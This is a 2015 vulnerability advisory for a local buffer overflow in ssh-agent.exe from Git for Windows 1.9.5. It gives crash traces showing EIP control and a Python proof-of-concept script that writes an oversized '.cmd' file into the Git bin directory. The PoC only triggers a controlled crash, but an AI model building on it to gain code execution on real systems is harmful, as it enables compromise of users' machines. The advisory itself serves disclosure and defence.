扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 |
''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source:http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt Vendor: ================================ git-scm.com Product: ================================ Git-1.9.5-preview20150319.exe github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319 Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ========================= Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible. Fault module seems to be msys-1.0.dll File Name: msys-1.0.dll MD5: 39E779952FF35D1EB3F74B9C36739092 APIVersion: 0.46 Stack trace: ------------- MSYS-1.0.12 Build:2012-07-05 14:56 Exception: STATUS_ACCESS_VIOLATION at eip=41414141 eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B Payload of 944 bytes to cause seg fault: @ 948 bytes we completely overwrite EBP register. @ 972 bytes KABOOOOOOOOOOM! we control EIP. Quick GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax0xffffffff -1 ecx0x680a4c3a 1745505338 edx0x680a4c3a 1745505338 ebx0x28f90c 2685196 esp0x28f884 0x28f884 ebp0x41414141 0x41414141 esi0x28f8fc 2685180 edi0x2660 9824 eip0x41414141 0x41414141 eflags 0x10246[ PF ZF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 POC code(s): =============== Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP. Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it! ''' import struct,os,shutil #Git ssh-agent.exe #EIP overwrite at 972 bytes #By hyp3rlinx #====================================================== file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell" payload="CALL ssh-agent.exe " x=open(file,"w") eip="A"*4 payload+="B"*968+eip x.write(payload) x.close() src="C:\\Program Files (x86)\\Git\\bin\\" shutil.move(file,file+".cmd") print "Git ssh-agent.exe buffer overflow POC\n" print "ssh_agent_hell.cmd file created!...\n" print "by hyp3rlinx" print "====================================\n" ''' Disclosure Timeline: ========================================================= Vendor Notification:August 10, 2015 Sept 26, 2015: Public Disclosure Exploitation Technique: ======================= Local Description: ========================================================== Vulnerable Product: [+]Git-1.9.5-preview20150319.exe =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx ''' |
体验盒子
